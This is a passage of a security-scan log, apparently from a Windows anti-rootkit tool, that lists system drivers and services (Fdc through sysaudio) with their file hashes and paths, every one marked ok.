20:31:23.0781 2536 [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc C:\WINDOWS\system32\DRIVERS\fdc.sys
20:31:23.0796 2536 Fdc - ok
20:31:23.0812 2536 [ D45926117EB9FA946A6AF572FBE1CAA3 ] Fips C:\WINDOWS\system32\drivers\Fips.sys
20:31:23.0812 2536 Fips - ok
20:31:23.0843 2536 [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk C:\WINDOWS\system32\DRIVERS\flpydisk.sys
20:31:23.0843 2536 Flpydisk - ok
20:31:23.0875 2536 [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
20:31:23.0875 2536 FltMgr - ok
20:31:23.0968 2536 [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
20:31:23.0968 2536 FontCache3.0.0.0 - ok
20:31:24.0000 2536 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
20:31:24.0015 2536 Fs_Rec - ok
20:31:24.0015 2536 [ 6AC26732762483366C3969C9E4D2259D ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
20:31:24.0031 2536 Ftdisk - ok
20:31:24.0062 2536 [ AB8A6A87D9D7255C3884D5B9541A6E80 ] GEARAspiWDM C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
20:31:24.0062 2536 GEARAspiWDM - ok
20:31:24.0078 2536 [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
20:31:24.0078 2536 Gpc - ok
20:31:24.0156 2536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
20:31:24.0156 2536 gupdate - ok
20:31:24.0156 2536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
20:31:24.0156 2536 gupdatem - ok
20:31:24.0187 2536 [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
20:31:24.0187 2536 HDAudBus - ok
20:31:24.0265 2536 [ 4FCCA060DFE0C51A09DD5C3843888BCD ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
20:31:24.0265 2536 helpsvc - ok
20:31:24.0265 2536 HidServ - ok
20:31:24.0312 2536 [ CCF82C5EC8A7326C3066DE870C06DAF1 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
20:31:24.0312 2536 HidUsb - ok
20:31:24.0343 2536 [ 8878BD685E490239777BFE51320B88E9 ] hkmsvc C:\WINDOWS\System32\kmsvc.dll
20:31:24.0359 2536 hkmsvc - ok
20:31:24.0359 2536 hpn - ok
20:31:24.0468 2536 [ CE0FCEC4D4D860F36D972759B11EAF0F ] hpqcxs08 C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
20:31:24.0500 2536 hpqcxs08 - ok
20:31:24.0515 2536 [ EE4C7A4CF2316701FFDE90F404520265 ] hpqddsvc C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
20:31:24.0515 2536 hpqddsvc - ok
20:31:24.0578 2536 [ 5FABA4775D4C61E55EC669D643FFC71F ] HPZid412 C:\WINDOWS\system32\DRIVERS\HPZid412.sys
20:31:24.0578 2536 HPZid412 - ok
20:31:24.0578 2536 [ A3C43980EE1F1BEAC778B44EA65DBDD4 ] HPZipr12 C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
20:31:24.0593 2536 HPZipr12 - ok
20:31:24.0593 2536 [ 2906949BD4E206F2BB0DD1896CE9F66F ] HPZius12 C:\WINDOWS\system32\DRIVERS\HPZius12.sys
20:31:24.0593 2536 HPZius12 - ok
20:31:24.0656 2536 [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
20:31:24.0656 2536 HTTP - ok
20:31:24.0703 2536 [ 6100A808600F44D999CEBDEF8841C7A3 ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
20:31:24.0718 2536 HTTPFilter - ok
20:31:24.0734 2536 i2omgmt - ok
20:31:24.0750 2536 i2omp - ok
20:31:24.0796 2536 [ 4A0B06AA8943C1E332520F7440C0AA30 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
20:31:24.0796 2536 i8042prt - ok
20:31:24.0890 2536 [ 0ACEBB31989CBF9A5663FE4A33D28D21 ] ialm C:\WINDOWS\system32\DRIVERS\ialmnt5.sys
20:31:24.0921 2536 ialm - ok
20:31:25.0000 2536 [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
20:31:25.0031 2536 idsvc - ok
20:31:25.0046 2536 [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
20:31:25.0046 2536 Imapi - ok
20:31:25.0109 2536 [ 30DEAF54A9755BB8546168CFE8A6B5E1 ] ImapiService C:\WINDOWS\system32\imapi.exe
20:31:25.0109 2536 ImapiService - ok
20:31:25.0125 2536 ini910u - ok
20:31:25.0250 2536 [ D383CEF6C0EF6DCAC644E2B954F2C202 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
20:31:25.0328 2536 IntcAzAudAddService - ok
20:31:25.0359 2536 [ B5466A9250342A7AA0CD1FBA13420678 ] IntelIde C:\WINDOWS\system32\DRIVERS\intelide.sys
20:31:25.0359 2536 IntelIde - ok
20:31:25.0406 2536 [ 8C953733D8F36EB2133F5BB58808B66B ] intelppm C:\WINDOWS\system32\DRIVERS\intelppm.sys
20:31:25.0406 2536 intelppm - ok
20:31:25.0421 2536 [ 3BB22519A194418D5FEC05D800A19AD0 ] ip6fw C:\WINDOWS\system32\drivers\ip6fw.sys
20:31:25.0437 2536 ip6fw - ok
20:31:25.0468 2536 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:31:25.0468 2536 IpFilterDriver - ok
20:31:25.0484 2536 [ B87AB476DCF76E72010632B5550955F5 ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
20:31:25.0484 2536 IpInIp - ok
20:31:25.0531 2536 [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
20:31:25.0531 2536 IpNat - ok
20:31:25.0578 2536 [ 62937A89470AF8FF172F0980CA8AEFC9 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
20:31:25.0593 2536 iPod Service - ok
20:31:25.0625 2536 [ 23C74D75E36E7158768DD63D92789A91 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
20:31:25.0625 2536 IPSec - ok
20:31:25.0656 2536 [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
20:31:25.0656 2536 IRENUM - ok
20:31:25.0703 2536 [ 05A299EC56E52649B1CF2FC52D20F2D7 ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
20:31:25.0703 2536 isapnp - ok
20:31:25.0750 2536 [ F59C3569A2F2C464BB78CB1BDCDCA55E ] Iviaspi C:\WINDOWS\system32\drivers\iviaspi.sys
20:31:25.0750 2536 Iviaspi - ok
20:31:25.0859 2536 [ 32192B4EBE8720ED8D49A455C962CB91 ] JavaQuickStarterService C:\Program Files\Java\jre6\bin\jqs.exe
20:31:25.0859 2536 JavaQuickStarterService - ok
20:31:25.0875 2536 [ 463C1EC80CD17420A542B7F36A36F128 ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
20:31:25.0875 2536 Kbdclass - ok
20:31:25.0921 2536 [ 692BCF44383D056AED41B045A323D378 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
20:31:25.0921 2536 kmixer - ok
20:31:25.0953 2536 [ B467646C54CC746128904E1654C750C1 ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
20:31:25.0953 2536 KSecDD - ok
20:31:26.0015 2536 [ 4103DBB6CAA85E40D271C1AD12BBF776 ] L8042pr2 C:\WINDOWS\system32\DRIVERS\L8042pr2.Sys
20:31:26.0015 2536 L8042pr2 - ok
20:31:26.0046 2536 [ 3A7C3CBE5D96B8AE96CE81F0B22FB527 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
20:31:26.0062 2536 lanmanserver - ok
20:31:26.0109 2536 [ A8888A5327621856C0CEC4E385F69309 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
20:31:26.0125 2536 lanmanworkstation - ok
20:31:26.0140 2536 lbrtfdc - ok
20:31:26.0187 2536 [ A7DB739AE99A796D91580147E919CC59 ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
20:31:26.0187 2536 LmHosts - ok
20:31:26.0218 2536 [ B666F835C18974F392A387C6E863072F ] LMouFlt2 C:\WINDOWS\system32\DRIVERS\LMouFlt2.Sys
20:31:26.0218 2536 LMouFlt2 - ok
20:31:26.0328 2536 [ E6CB119EF2E148EAA1A247343550756E ] McciCMService C:\Program Files\Common Files\Motive\McciCMService.exe
20:31:26.0343 2536 McciCMService - ok
20:31:26.0359 2536 [ 986B1FF5814366D71E0AC5755C88F2D3 ] Messenger C:\WINDOWS\System32\msgsvc.dll
20:31:26.0375 2536 Messenger - ok
20:31:26.0406 2536 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
20:31:26.0406 2536 mnmdd - ok
20:31:26.0437 2536 [ D18F1F0C101D06A1C1ADF26EED16FCDD ] mnmsrvc C:\WINDOWS\System32\mnmsrvc.exe
20:31:26.0437 2536 mnmsrvc - ok
20:31:26.0468 2536 [ DFCBAD3CEC1C5F964962AE10E0BCC8E1 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
20:31:26.0468 2536 Modem - ok
20:31:26.0484 2536 [ 35C9E97194C8CFB8430125F8DBC34D04 ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
20:31:26.0484 2536 Mouclass - ok
20:31:26.0546 2536 [ B1C303E17FB9D46E87A98E4BA6769685 ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
20:31:26.0546 2536 mouhid - ok
20:31:26.0578 2536 [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
20:31:26.0578 2536 MountMgr - ok
20:31:26.0640 2536 [ 730A519505621DF46BCBF9CDAC9FB6AD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
20:31:26.0656 2536 MozillaMaintenance - ok
20:31:26.0687 2536 MpKsl08115bda - ok
20:31:26.0687 2536 mraid35x - ok
20:31:26.0718 2536 [ 9BD4DCB5412921864A7AACDEDFBD1923 ] MREMP50 C:\PROGRA~1\COMMON~1\Motive\MREMP50.SYS
20:31:26.0718 2536 MREMP50 - ok
20:31:26.0750 2536 [ 2BC9E43F55DE8C30FC817ED56D0EE907 ] MREMPR5 C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS
20:31:26.0750 2536 MREMPR5 - ok
20:31:26.0765 2536 [ 594B9D8194E3F4ECBF0325BD10BBEB05 ] MRENDIS5 C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS
20:31:26.0765 2536 MRENDIS5 - ok
20:31:26.0796 2536 [ 07C02C892E8E1A72D6BF35004F0E9C5E ] MRESP50 C:\PROGRA~1\COMMON~1\Motive\MRESP50.SYS
20:31:26.0796 2536 MRESP50 - ok
20:31:26.0812 2536 mrtRate - ok
20:31:26.0843 2536 [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
20:31:26.0843 2536 MRxDAV - ok
20:31:26.0906 2536 [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
20:31:26.0921 2536 MRxSmb - ok
20:31:26.0953 2536 [ A137F1470499A205ABBB9AAFB3B6F2B1 ] MSDTC C:\WINDOWS\System32\msdtc.exe
20:31:26.0968 2536 MSDTC - ok
20:31:26.0984 2536 [ C941EA2454BA8350021D774DAF0F1027 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
20:31:26.0984 2536 Msfs - ok
20:31:26.0984 2536 MSIServer - ok
20:31:27.0015 2536 [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
20:31:27.0015 2536 MSKSSRV - ok
20:31:27.0031 2536 [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
20:31:27.0031 2536 MSPCLOCK - ok
20:31:27.0031 2536 [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
20:31:27.0046 2536 MSPQM - ok
20:31:27.0062 2536 [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
20:31:27.0062 2536 mssmbios - ok
20:31:27.0093 2536 [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
20:31:27.0093 2536 Mup - ok
20:31:27.0140 2536 [ 0102140028FAD045756796E1C685D695 ] napagent C:\WINDOWS\System32\qagentrt.dll
20:31:27.0171 2536 napagent - ok
20:31:27.0218 2536 [ 1DF7F42665C94B825322FAE71721130D ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
20:31:27.0218 2536 NDIS - ok
20:31:27.0265 2536 [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
20:31:27.0265 2536 NdisTapi - ok
20:31:27.0281 2536 [ F927A4434C5028758A842943EF1A3849 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
20:31:27.0281 2536 Ndisuio - ok
20:31:27.0281 2536 [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:31:27.0296 2536 NdisWan - ok
20:31:27.0312 2536 [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
20:31:27.0312 2536 NDProxy - ok
20:31:27.0375 2536 [ 2969D26EEE289BE7422AA46FC55F4E38 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
20:31:27.0390 2536 Net Driver HPZ12 - ok
20:31:27.0390 2536 [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
20:31:27.0390 2536 NetBIOS - ok
20:31:27.0421 2536 [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
20:31:27.0421 2536 NetBT - ok
20:31:27.0468 2536 [ B857BA82860D7FF85AE29B095645563B ] NetDDE C:\WINDOWS\system32\netdde.exe
20:31:27.0484 2536 NetDDE - ok
20:31:27.0484 2536 [ B857BA82860D7FF85AE29B095645563B ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
20:31:27.0500 2536 NetDDEdsdm - ok
20:31:27.0531 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] Netlogon C:\WINDOWS\system32\lsass.exe
20:31:27.0546 2536 Netlogon - ok
20:31:27.0562 2536 [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE ] Netman C:\WINDOWS\System32\netman.dll
20:31:27.0578 2536 Netman - ok
20:31:27.0609 2536 [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
20:31:27.0609 2536 NetTcpPortSharing - ok
20:31:27.0640 2536 [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394 C:\WINDOWS\system32\DRIVERS\nic1394.sys
20:31:27.0656 2536 NIC1394 - ok
20:31:27.0703 2536 [ 943337D786A56729263071623BBB9DE5 ] Nla C:\WINDOWS\System32\mswsock.dll
20:31:27.0718 2536 Nla - ok
20:31:27.0750 2536 [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
20:31:27.0750 2536 Npfs - ok
20:31:27.0828 2536 [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
20:31:27.0843 2536 Ntfs - ok
20:31:27.0859 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] NtLmSsp C:\WINDOWS\System32\lsass.exe
20:31:27.0859 2536 NtLmSsp - ok
20:31:27.0890 2536 [ 156F64A3345BD23C600655FB4D10BC08 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
20:31:27.0906 2536 NtmsSvc - ok
20:31:27.0953 2536 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
20:31:27.0953 2536 Null - ok
20:31:27.0968 2536 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
20:31:27.0968 2536 NwlnkFlt - ok
20:31:27.0984 2536 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
20:31:27.0984 2536 NwlnkFwd - ok
20:31:28.0015 2536 [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394 C:\WINDOWS\system32\DRIVERS\ohci1394.sys
20:31:28.0015 2536 ohci1394 - ok
20:31:28.0125 2536 [ 7A56CF3E3F12E8AF599963B16F50FB6A ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:31:28.0125 2536 ose - ok
20:31:28.0156 2536 [ 5575FAF8F97CE5E713D108C2A58D7C7C ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
20:31:28.0156 2536 Parport - ok
20:31:28.0156 2536 [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
20:31:28.0171 2536 PartMgr - ok
20:31:28.0203 2536 [ 70E98B3FD8E963A6A46A2E6247E0BEA1 ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
20:31:28.0203 2536 ParVdm - ok
20:31:28.0218 2536 [ A219903CCF74233761D92BEF471A07B1 ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
20:31:28.0218 2536 PCI - ok
20:31:28.0234 2536 PCIDump - ok
20:31:28.0265 2536 [ CCF5F451BB1A5A2A522A76E670000FF0 ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
20:31:28.0265 2536 PCIIde - ok
20:31:28.0296 2536 [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1 ] Pcmcia C:\WINDOWS\system32\drivers\Pcmcia.sys
20:31:28.0296 2536 Pcmcia - ok
20:31:28.0296 2536 PDCOMP - ok
20:31:28.0312 2536 PDFRAME - ok
20:31:28.0328 2536 PDRELI - ok
20:31:28.0328 2536 PDRFRAME - ok
20:31:28.0343 2536 perc2 - ok
20:31:28.0359 2536 perc2hib - ok
20:31:28.0390 2536 [ 444F122E68DB44C0589227781F3C8B3F ] Pfc C:\WINDOWS\system32\drivers\pfc.sys
20:31:28.0390 2536 Pfc - ok
20:31:28.0406 2536 [ 65DF52F5B8B6E9BBD183505225C37315 ] PlugPlay C:\WINDOWS\system32\services.exe
20:31:28.0421 2536 PlugPlay - ok
20:31:28.0437 2536 [ BAFC9706BDF425A02B66468AB2605C59 ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
20:31:28.0437 2536 Pml Driver HPZ12 - ok
20:31:28.0453 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] PolicyAgent C:\WINDOWS\system32\lsass.exe
20:31:28.0453 2536 PolicyAgent - ok
20:31:28.0484 2536 [ EFEEC01B1D3CF84F16DDD24D9D9D8F99 ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
20:31:28.0484 2536 PptpMiniport - ok
20:31:28.0515 2536 [ A32BEBAF723557681BFC6BD93E98BD26 ] Processor C:\WINDOWS\system32\DRIVERS\processr.sys
20:31:28.0515 2536 Processor - ok
20:31:28.0515 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
20:31:28.0531 2536 ProtectedStorage - ok
20:31:28.0562 2536 [ 390C204CED3785609AB24E9C52054A84 ] Ps2 C:\WINDOWS\system32\DRIVERS\PS2.sys
20:31:28.0562 2536 Ps2 - ok
20:31:28.0593 2536 [ 09298EC810B07E5D582CB3A3F9255424 ] PSched C:\WINDOWS\system32\DRIVERS\psched.sys
20:31:28.0593 2536 PSched - ok
20:31:28.0625 2536 [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink C:\WINDOWS\system32\DRIVERS\ptilink.sys
20:31:28.0625 2536 Ptilink - ok
20:31:28.0671 2536 [ E42E3433DBB4CFFE8FDD91EAB29AEA8E ] PxHelp20 C:\WINDOWS\system32\DRIVERS\PxHelp20.sys
20:31:28.0671 2536 PxHelp20 - ok
20:31:28.0687 2536 ql1080 - ok
20:31:28.0687 2536 Ql10wnt - ok
20:31:28.0703 2536 ql12160 - ok
20:31:28.0718 2536 ql1240 - ok
20:31:28.0718 2536 ql1280 - ok
20:31:28.0765 2536 [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
20:31:28.0765 2536 RasAcd - ok
20:31:28.0796 2536 [ AD188BE7BDF94E8DF4CA0A55C00A5073 ] RasAuto C:\WINDOWS\System32\rasauto.dll
20:31:28.0812 2536 RasAuto - ok
20:31:28.0843 2536 [ 11B4A627BC9614B885C4969BFA5FF8A6 ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
20:31:28.0843 2536 Rasl2tp - ok
20:31:28.0890 2536 [ 76A9A3CBEADD68CC57CDA5E1D7448235 ] RasMan C:\WINDOWS\System32\rasmans.dll
20:31:28.0906 2536 RasMan - ok
20:31:28.0906 2536 [ 5BC962F2654137C9909C3D4603587DEE ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
20:31:28.0921 2536 RasPppoe - ok
20:31:28.0921 2536 [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti C:\WINDOWS\system32\DRIVERS\raspti.sys
20:31:28.0921 2536 Raspti - ok
20:31:28.0968 2536 [ 7AD224AD1A1437FE28D89CF22B17780A ] Rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
20:31:28.0968 2536 Rdbss - ok
20:31:28.0984 2536 [ 4912D5B403614CE99C28420F75353332 ] RDPCDD C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
20:31:28.0984 2536 RDPCDD - ok
20:31:29.0046 2536 [ 43AF5212BD8FB5BA6EED9754358BD8F7 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
20:31:29.0046 2536 RDPWD - ok
20:31:29.0093 2536 [ 3C37BF86641BDA977C3BF8A840F3B7FA ] RDSessMgr C:\WINDOWS\system32\sessmgr.exe
20:31:29.0109 2536 RDSessMgr - ok
20:31:29.0140 2536 [ F828DD7E1419B6653894A8F97A0094C5 ] redbook C:\WINDOWS\system32\DRIVERS\redbook.sys
20:31:29.0140 2536 redbook - ok
20:31:29.0187 2536 [ 7E699FF5F59B5D9DE5390E3C34C67CF5 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
20:31:29.0187 2536 RemoteAccess - ok
20:31:29.0203 2536 [ AAED593F84AFA419BBAE8572AF87CF6A ] RpcLocator C:\WINDOWS\System32\locator.exe
20:31:29.0218 2536 RpcLocator - ok
20:31:29.0265 2536 [ 6B27A5C03DFB94B4245739065431322C ] RpcSs C:\WINDOWS\System32\rpcss.dll
20:31:29.0265 2536 RpcSs - ok
20:31:29.0296 2536 [ 471B3F9741D762ABE75E9DEEA4787E47 ] RSVP C:\WINDOWS\System32\rsvp.exe
20:31:29.0312 2536 RSVP - ok
20:31:29.0343 2536 [ 2EF9C0DC26B30B2318B1FC3FAA1F0AE7 ] rtl8139 C:\WINDOWS\system32\DRIVERS\R8139n51.SYS
20:31:29.0343 2536 rtl8139 - ok
20:31:29.0359 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] SamSs C:\WINDOWS\system32\lsass.exe
20:31:29.0359 2536 SamSs - ok
20:31:29.0437 2536 [ 39763504067962108505BFF25F024345 ] SASDIFSV C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
20:31:29.0453 2536 SASDIFSV - ok
20:31:29.0468 2536 [ 77B9FC20084B48408AD3E87570EB4A85 ] SASKUTIL C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
20:31:29.0468 2536 SASKUTIL - ok
20:31:29.0500 2536 [ 86D007E7A654B9A71D1D7D856B104353 ] SCardSvr C:\WINDOWS\System32\SCardSvr.exe
20:31:29.0515 2536 SCardSvr - ok
20:31:29.0546 2536 [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA ] Schedule C:\WINDOWS\system32\schedsvc.dll
20:31:29.0562 2536 Schedule - ok
20:31:29.0609 2536 [ 90A3935D05B494A5A39D37E71F09A677 ] Secdrv C:\WINDOWS\system32\DRIVERS\secdrv.sys
20:31:29.0609 2536 Secdrv - ok
20:31:29.0640 2536 [ CBE612E2BB6A10E3563336191EDA1250 ] seclogon C:\WINDOWS\System32\seclogon.dll
20:31:29.0640 2536 seclogon - ok
20:31:29.0656 2536 [ 7FDD5D0684ECA8C1F68B4D99D124DCD0 ] SENS C:\WINDOWS\system32\sens.dll
20:31:29.0671 2536 SENS - ok
20:31:29.0671 2536 [ CCA207A8896D4C6A0C9CE29A4AE411A7 ] Serial C:\WINDOWS\system32\drivers\Serial.sys
20:31:29.0687 2536 Serial - ok
20:31:29.0718 2536 [ 8E6B8C671615D126FDC553D1E2DE5562 ] Sfloppy C:\WINDOWS\system32\drivers\Sfloppy.sys
20:31:29.0718 2536 Sfloppy - ok
20:31:29.0765 2536 [ 83F41D0D89645D7235C051AB1D9523AC ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
20:31:29.0781 2536 SharedAccess - ok
20:31:29.0812 2536 [ 99BC0B50F511924348BE19C7C7313BBF ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
20:31:29.0828 2536 ShellHWDetection - ok
20:31:29.0843 2536 Simbad - ok
20:31:29.0890 2536 [ 94F6EEA8A688A37F71BF9C9AEAA42666 ] SiS315 C:\WINDOWS\system32\DRIVERS\sisgrp.sys
20:31:29.0890 2536 SiS315 - ok
20:31:29.0921 2536 [ 61CA562DEF09A782D26B3E7EDEC5369A ] SISAGP C:\WINDOWS\system32\DRIVERS\SISAGPX.sys
20:31:29.0921 2536 SISAGP - ok
20:31:29.0937 2536 [ 837D26F79A1647066D75C5C811887475 ] SiSkp C:\WINDOWS\system32\DRIVERS\srvkp.sys
20:31:29.0953 2536 SiSkp - ok
20:31:29.0953 2536 Sparrow - ok
20:31:30.0000 2536 [ AB8B92451ECB048A4D1DE7C3FFCB4A9F ] splitter C:\WINDOWS\system32\drivers\splitter.sys
20:31:30.0000 2536 splitter - ok
20:31:30.0062 2536 [ 60784F891563FB1B767F70117FC2428F ] Spooler C:\WINDOWS\system32\spoolsv.exe
20:31:30.0078 2536 Spooler - ok
20:31:30.0093 2536 [ 76BB022C2FB6902FD5BDD4F78FC13A5D ] sr C:\WINDOWS\system32\DRIVERS\sr.sys
20:31:30.0093 2536 sr - ok
20:31:30.0140 2536 [ 3805DF0AC4296A34BA4BF93B346CC378 ] srservice C:\WINDOWS\system32\srsvc.dll
20:31:30.0156 2536 srservice - ok
20:31:30.0187 2536 [ 47DDFC2F003F7F9F0592C6874962A2E7 ] Srv C:\WINDOWS\system32\DRIVERS\srv.sys
20:31:30.0203 2536 Srv - ok
20:31:30.0218 2536 [ 0A5679B3714EDAB99E357057EE88FCA6 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
20:31:30.0218 2536 SSDPSRV - ok
20:31:30.0265 2536 [ A9573045BAA16EAB9B1085205B82F1ED ] StillCam C:\WINDOWS\system32\DRIVERS\serscan.sys
20:31:30.0265 2536 StillCam - ok
20:31:30.0281 2536 [ 8BAD69CBAC032D4BBACFCE0306174C30 ] stisvc C:\WINDOWS\system32\wiaservc.dll
20:31:30.0296 2536 stisvc - ok
20:31:30.0328 2536 [ 3941D127AEF12E93ADDF6FE6EE027E0F ] swenum C:\WINDOWS\system32\DRIVERS\swenum.sys
20:31:30.0328 2536 swenum - ok
20:31:30.0375 2536 [ 8CE882BCC6CF8A62F2B2323D95CB3D01 ] swmidi C:\WINDOWS\system32\drivers\swmidi.sys
20:31:30.0375 2536 swmidi - ok
20:31:30.0390 2536 SwPrv - ok
20:31:30.0406 2536 symc810 - ok
20:31:30.0421 2536 symc8xx - ok
20:31:30.0421 2536 sym_hi - ok
20:31:30.0437 2536 sym_u3 - ok
20:31:30.0453 2536 [ 8B83F3ED0F1688B4958F77CD6D2BF290 ] sysaudio C:\WINDOWS\system32\drivers\sysaudio.sys
20:31:30.0453 2536 sysaudio - ok
